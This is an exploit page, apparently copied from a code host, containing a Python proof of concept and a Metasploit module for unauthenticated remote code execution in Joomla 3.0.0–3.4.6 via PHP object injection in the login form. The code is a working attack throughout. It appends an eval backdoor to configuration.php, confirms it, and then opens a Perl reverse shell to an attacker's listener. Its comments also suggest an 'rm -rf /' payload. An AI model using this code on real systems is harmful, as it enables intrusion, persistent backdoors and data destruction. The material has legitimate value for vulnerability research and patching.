479 lines
No EOL
17 KiB
Python
Executable file
479 lines
No EOL
17 KiB
Python
Executable file
# Exploit Title: Joomla! 3.4.6 - Remote Code Execution
|
|
# Google Dork: N/A
|
|
# Date: 2019-10-02
|
|
# Exploit Author: Alessandro Groppo
|
|
# Vendor Homepage: https//www.joomla.it/
|
|
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
|
|
# Version: 3.0.0 --> 3.4.6
|
|
# Tested on: Linux
|
|
# CVE : N/A
|
|
|
|
|
|
# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
|
|
# Github: https://github.com/kiks7/rusty_joomla_rce
|
|
#
|
|
# The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive.
|
|
# If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')
|
|
|
|
|
|
#!/usr/bin/env python3
|
|
import requests
|
|
from bs4 import BeautifulSoup
|
|
import sys
|
|
import string
|
|
import random
|
|
import argparse
|
|
from termcolor import colored
|
|
|
|
PROXS = {'http':'127.0.0.1:8080'}
|
|
PROXS = {}
|
|
|
|
def random_string(stringLength):
|
|
letters = string.ascii_lowercase
|
|
return ''.join(random.choice(letters) for i in range(stringLength))
|
|
|
|
|
|
backdoor_param = random_string(50)
|
|
|
|
def print_info(str):
|
|
print(colored("[*] " + str,"cyan"))
|
|
|
|
def print_ok(str):
|
|
print(colored("[+] "+ str,"green"))
|
|
|
|
def print_error(str):
|
|
print(colored("[-] "+ str,"red"))
|
|
|
|
def print_warning(str):
|
|
print(colored("[!!] " + str,"yellow"))
|
|
|
|
def get_token(url, cook):
|
|
token = ''
|
|
resp = requests.get(url, cookies=cook, proxies = PROXS)
|
|
html = BeautifulSoup(resp.text,'html.parser')
|
|
# csrf token is the last input
|
|
for v in html.find_all('input'):
|
|
csrf = v
|
|
csrf = csrf.get('name')
|
|
return csrf
|
|
|
|
|
|
def get_error(url, cook):
|
|
resp = requests.get(url, cookies = cook, proxies = PROXS)
|
|
if 'Failed to decode session object' in resp.text:
|
|
#print(resp.text)
|
|
return False
|
|
#print(resp.text)
|
|
return True
|
|
|
|
|
|
def get_cook(url):
|
|
resp = requests.get(url, proxies=PROXS)
|
|
#print(resp.cookies)
|
|
return resp.cookies
|
|
|
|
|
|
def gen_pay(function, command):
|
|
# Generate the payload for call_user_func('FUNCTION','COMMAND')
|
|
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
|
|
#payload = command + ' || $a=\'http://wtf\';'
|
|
payload = 'http://l4m3rz.l337/;' + command
|
|
# Following payload will append an eval() at the enabled of the configuration file
|
|
#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
|
|
function_len = len(function)
|
|
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
|
|
return final
|
|
|
|
def make_req(url , object_payload):
|
|
# just make a req with object
|
|
print_info('Getting Session Cookie ..')
|
|
cook = get_cook(url)
|
|
print_info('Getting CSRF Token ..')
|
|
csrf = get_token( url, cook)
|
|
|
|
user_payload = '\\0\\0\\0' * 9
|
|
padding = 'AAA' # It will land at this padding
|
|
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
|
|
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
|
|
|
|
inj_object = '";'
|
|
inj_object += object_payload
|
|
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
|
|
password_payload = padding + inj_object
|
|
params = {
|
|
'username': user_payload,
|
|
'password': password_payload,
|
|
'option':'com_users',
|
|
'task':'user.login',
|
|
csrf :'1'
|
|
}
|
|
|
|
print_info('Sending request ..')
|
|
resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
|
|
return resp.text
|
|
|
|
def get_backdoor_pay():
|
|
# This payload will backdoor the the configuration .PHP with an eval on POST request
|
|
|
|
function = 'assert'
|
|
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
|
|
# payload = command + ' || $a=\'http://wtf\';'
|
|
# Following payload will append an eval() at the enabled of the configuration file
|
|
payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
|
|
function_len = len(function)
|
|
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
|
|
return final
|
|
|
|
def check(url):
|
|
check_string = random_string(20)
|
|
target_url = url + 'index.php/component/users'
|
|
html = make_req(url, gen_pay('print_r',check_string))
|
|
if check_string in html:
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
def ping_backdoor(url,param_name):
|
|
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
|
|
if 'PWNED' in res.text:
|
|
return True
|
|
return False
|
|
|
|
def execute_backdoor(url, payload_code):
|
|
# Execute PHP code from the backdoor
|
|
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
|
|
print(res.text)
|
|
|
|
def exploit(url, lhost, lport):
|
|
# Exploit the target
|
|
# Default exploitation will append en eval function at the end of the configuration.pphp
|
|
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
|
|
# e.g. get_payload('system','rm -rf /')
|
|
|
|
# First check that the backdoor has not been already implanted
|
|
target_url = url + 'index.php/component/users'
|
|
|
|
make_req(target_url, get_backdoor_pay())
|
|
if ping_backdoor(url, backdoor_param):
|
|
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
|
|
print_info('Now it\'s time to reverse, trying with a system + perl')
|
|
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
|
|
|
|
|
|
if __name__ == '__main__':
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('-t','--target',required=True,help='Joomla Target')
|
|
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
|
|
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
|
|
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
|
|
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
|
|
args = vars(parser.parse_args())
|
|
|
|
url = args['target']
|
|
if(check(url)):
|
|
print_ok('Vulnerable')
|
|
if args['exploit']:
|
|
exploit(url, args['lhost'], args['lport'])
|
|
else:
|
|
print_info('Use --exploit to exploit it')
|
|
|
|
else:
|
|
print_error('Seems NOT Vulnerable ;/')
|
|
|
|
|
|
metasploit_rusty_joomla_rce.rb
|
|
|
|
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HTTP::Joomla
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution',
|
|
'Description' => %q{
|
|
PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
|
|
The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
|
|
That's because the exploit is more reliabale (doesn't rely on common disabled function).
|
|
For this reason, use it with caution and remember the house cleaning.
|
|
Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with
|
|
get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Alessandro \'kiks\' Groppo @Hacktive Security',
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41']
|
|
],
|
|
'Privileged' => false,
|
|
'Platform' => 'PHP',
|
|
'Arch' => ARCH_PHP,
|
|
'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]],
|
|
'DisclosureDate' => 'Oct 02 2019',
|
|
'DefaultTarget' => 0)
|
|
)
|
|
|
|
register_advanced_options(
|
|
[
|
|
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
|
|
])
|
|
end
|
|
|
|
def get_random_string(length=50)
|
|
source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a
|
|
key=""
|
|
length.times{ key += source[rand(source.size)].to_s }
|
|
return key
|
|
end
|
|
|
|
def get_session_token
|
|
# Get session token from cookies
|
|
vprint_status('Getting Session Token')
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path)
|
|
})
|
|
|
|
cook = res.headers['Set-Cookie'].split(';')[0]
|
|
vprint_status('Session cookie: ' + cook)
|
|
return cook
|
|
end
|
|
|
|
def get_csrf_token(sess_cookie)
|
|
vprint_status('Getting CSRF Token')
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
|
|
'headers' => {
|
|
'Cookie' => sess_cookie,
|
|
}
|
|
})
|
|
|
|
html = res.get_html_document
|
|
input_field = html.at('//form').xpath('//input')[-1]
|
|
token = input_field.to_s.split(' ')[2]
|
|
token = token.gsub('name="','').gsub('"','')
|
|
if token then
|
|
vprint_status('CSRF Token: ' + token)
|
|
return token
|
|
end
|
|
print_error('Cannot get the CSRF Token ..')
|
|
|
|
end
|
|
|
|
def get_payload(function, payload)
|
|
# @function: The PHP Function
|
|
# @payload: The payload for the call
|
|
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
|
|
# The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
|
|
payload = 'http://l4m3rz.l337/;' + payload
|
|
final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
|
|
return final
|
|
end
|
|
|
|
|
|
def get_payload_backdoor(param_name)
|
|
# return the backdoor payload
|
|
# or better, the payload that will inject and eval function in configuration.php (in the root)
|
|
# As said in other part of the code. we cannot create new .php file because we cannot use
|
|
# the ? character because of the check on URI schema
|
|
function = 'assert'
|
|
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
|
|
# This payload will append an eval() at the end of the configuration file
|
|
payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
|
|
template['PAYLOAD'] = payload
|
|
template['LENGTH'] = payload.length.to_s
|
|
template['FUNC_NAME'] = function
|
|
template['FUNC_LEN'] = function.length.to_s
|
|
return template
|
|
|
|
end
|
|
|
|
|
|
def check_by_exploiting
|
|
# Check that is vulnerable by exploiting it and try to inject a printr('something')
|
|
# Get the Session anb CidSRF Tokens
|
|
sess_token = get_session_token()
|
|
csrf_token = get_csrf_token(sess_token)
|
|
|
|
print_status('Testing with a POC object payload')
|
|
|
|
username_payload = '\\0\\0\\0' * 9
|
|
password_payload = 'AAA";' # close the prev object
|
|
password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload
|
|
password_payload += 's:6:"return":s:102:' # close cleanly the object
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
|
|
'method' => 'POST',
|
|
'headers' =>
|
|
{
|
|
'Cookie' => sess_token,
|
|
},
|
|
'vars_post' => {
|
|
'username' => username_payload,
|
|
'password' => password_payload,
|
|
'option' => 'com_users',
|
|
'task' => 'user.login',
|
|
csrf_token => '1',
|
|
}
|
|
})
|
|
# Redirect in order to retrieve the output
|
|
if res.redirection then
|
|
res_redirect = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => res.redirection.to_s,
|
|
'headers' =>{
|
|
'Cookie' => sess_token
|
|
}
|
|
})
|
|
|
|
if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
|
|
return true
|
|
else
|
|
return false
|
|
end
|
|
|
|
end
|
|
end
|
|
|
|
def check
|
|
# Check if the target is UP and get the current version running by info leak
|
|
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
|
|
unless res
|
|
print_error("Connection timed out")
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
# Parse XML to get the version
|
|
if res.code == 200 then
|
|
xml = res.get_xml_document
|
|
version = xml.at('version').text
|
|
print_status('Identified version ' + version)
|
|
if version <= '3.4.6' and version >= '3.0.0' then
|
|
if check_by_exploiting()
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
if check_by_exploiting() then
|
|
# Try the POC 2 times.
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
else
|
|
print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
|
|
if check_by_exploiting() then
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
if check_by_exploiting() then
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
if check == Exploit::CheckCode::Safe && !datastore['FORCE']
|
|
print_error('Target is not vulnerable')
|
|
return
|
|
end
|
|
|
|
|
|
pwned = false
|
|
cmd_param_name = get_random_string(50)
|
|
|
|
sess_token = get_session_token()
|
|
csrf_token = get_csrf_token(sess_token)
|
|
|
|
# In order to avoid problems with disabled functions
|
|
# We are gonna append an eval() function at the end of the configuration.php file
|
|
# This will not cause any problem to Joomla and is a good way to execute then PHP directly
|
|
# cuz assert is toot annoying and with conditions that we have we cannot inject some characters
|
|
# So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
|
|
# Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
|
|
|
|
# TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
|
|
# Use the implanted backdoor to receive a nice little reverse shell with a PHP payload
|
|
|
|
|
|
# Implant the backdoor
|
|
vprint_status('Cooking the exploit ..')
|
|
username_payload = '\\0\\0\\0' * 9
|
|
password_payload = 'AAA";' # close the prev object
|
|
password_payload += get_payload_backdoor(cmd_param_name) # actual payload
|
|
password_payload += 's:6:"return":s:102:' # close cleanly the object
|
|
|
|
print_status('Sending exploit ..')
|
|
|
|
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
|
|
'method' => 'POST',
|
|
'headers' => {
|
|
'Cookie' => sess_token
|
|
},
|
|
'vars_post' => {
|
|
'username' => username_payload,
|
|
'password' => password_payload,
|
|
'option' => 'com_users',
|
|
'task' => 'user.login',
|
|
csrf_token => '1'
|
|
}
|
|
})
|
|
|
|
print_status('Triggering the exploit ..')
|
|
if res.redirection then
|
|
res_redirect = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => res.redirection.to_s,
|
|
'headers' =>{
|
|
'Cookie' => sess_token
|
|
}
|
|
})
|
|
end
|
|
|
|
# Ping the backdoor see if everything is ok :/
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path,'configuration.php'),
|
|
'vars_post' => {
|
|
cmd_param_name => 'echo \'PWNED\';'
|
|
}
|
|
})
|
|
if res.to_s.include? 'PWNED' then
|
|
print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
|
|
pwned = true
|
|
end
|
|
|
|
|
|
|
|
if pwned then
|
|
print_status('Now it\'s time to reverse shell')
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path,'configuration.php'),
|
|
'vars_post' => {
|
|
cmd_param_name => payload.encoded
|
|
}
|
|
})
|
|
end
|
|
|
|
end
|
|
end |